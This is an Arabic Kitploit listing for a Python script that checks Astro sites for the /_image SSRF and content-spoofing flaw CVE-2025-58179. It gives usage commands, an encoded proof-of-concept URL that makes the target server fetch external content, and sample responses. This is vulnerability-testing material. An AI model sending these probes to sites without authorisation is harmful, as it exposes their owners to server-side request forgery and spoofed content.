Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-58179-Check — نص بايثون للتحقق من ثغرات SSRF وانتحال المحتوى (CVE-2025-58179) في نقطة نهاية `/_image` في Astro، مع توليد تلقائي لعناوين PoC والتحقق من استجابة HTTP. | Kitploit
أدوات/GitHubGitHub/shitodcy/cve-2025-58179-check
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubshitodcy/cve-2025-58179-check

CVE-2025-58179-Check

نص بايثون للتحقق من ثغرات SSRF وانتحال المحتوى (CVE-2025-58179) في نقطة نهاية `/_image` في Astro، مع توليد تلقائي لعناوين PoC والتحقق من استجابة HTTP.

عرض المستودع
12منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-58179-Check

CVE-2025-58179-Check هو سكربت بسيط بلغة Python للتحقق من ثغرة SSRF (تزوير الطلب من جانب الخادم) / انتحال المحتوى في نقطة النهاية /_image في إطار عمل Astro.

يتم تتبع هذه الثغرة باسم GHSA-qpr4-c339-7vq8 و CVE-2025-58179.

خلفية الثغرة

تؤثر هذه الثغرة على مواقع Astro التي تستخدم المحول @astrojs/cloudflare مع تكوين output: 'server'. نقطة النهاية /_image التي يفترض أن تقوم بتحسين الصور، تفشل في التحقق من المعامل href بشكل صحيح.

يسمح ذلك للمهاجم بجعل الخادم يقوم بجلب وعرض محتوى من نطاقات خارجية غير مصرح بها. يمكن أن يكون التأثير SSRF، وإذا كان المحتوى الخارجي عبارة عن ملف ضار (مثل SVG يحتوي على سكريبت)، فقد يؤدي ذلك إلى Cross-Site Scripting (XSS).

يقوم هذا السكربت بأتمتة عملية الاختبار لمعرفة ما إذا كان موقع معين عرضة لهذه المشكلة.

الميزات

  • إنشاء عنوان URL لـ PoC (إثبات المفهوم) بالتنسيق الصحيح تلقائياً.
  • إجراء التحقق عبر HTTP (اختياري) للتحقق من استجابة الخادم.
  • تلوين المخرجات بالألوان لسهولة التحليل (رمز الحالة، النتيجة).
  • اكتشاف الاستجابات الضعيفة (مثلاً، Status 200 مع Content-Type: image/*).

المتطلبات

  • Python 3
  • مكتبة requests (فقط عند استخدام وظيفة التحقق)

يمكنك تثبيت requests باستخدام pip:

root@kitploit:~
pip install requests

طريقة الاستخدام

  1. استنساخ هذا المستودع أو نسخ السكربت CVE-2025-58179-Check.py.
  2. تأكد من أن السكربت قابل للتنفيذ (إذا لزم الأمر): chmod +x CVE-2025-58179-Check.py

1. إنشاء عنوان URL فقط (بدون تحقق)

سيقوم هذا الخيار بطباعة عنوان URL لـ PoC بعد ترميزه. مفيد إذا كنت تريد الاختبار يدوياً في المتصفح أو باستخدام أدوات أخرى.

الأمر:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>

مثال:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)

المخرجات:

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

2. إنشاء عنوان URL والتحقق عبر HTTP

سيقوم هذا الخيار بإنشاء عنوان URL وإرسال طلب HTTP GET مباشرة للتحقق من استجابة الخادم.

الأمر:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r

مثال:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request

أمثلة على مخرجات التحقق

مثال على النتيجة: ضعيف (Vulnerable)

إذا قام الخادم بإرجاع رمز الحالة 200 وكان نوع المحتوى صورة، فإن هذا يشير إلى أن الخادم قام بجلب وعرض محتوى خارجي.

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 200
[+] Content Type: image/jpeg
[+] Server returned image content - Potential vulnerability detected!

مثال على النتيجة: غير ضعيف (تم التصحيح)

الخادم الذي تم تصحيحه أو تكوينه بشكل صحيح سيرفض الطلبات إلى النطاقات الخارجية غير المصرح بها، عادةً بإرجاع رمز الحالة 4xx.

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 400
[+] Content Type: text/plain;charset=UTF-8
[+] Client error - Resource might not be accessible

[!WARNING] تحذير

  • تم إنشاء هذا السكربت لأغراض تعليمية واختبار الأمن المشروع.
  • المستخدم مسؤول بالكامل عن أفعاله. لا تستخدم هذا السكربت على أنظمة لا تملك الإذن لاختبارها.
تنزيل الأداة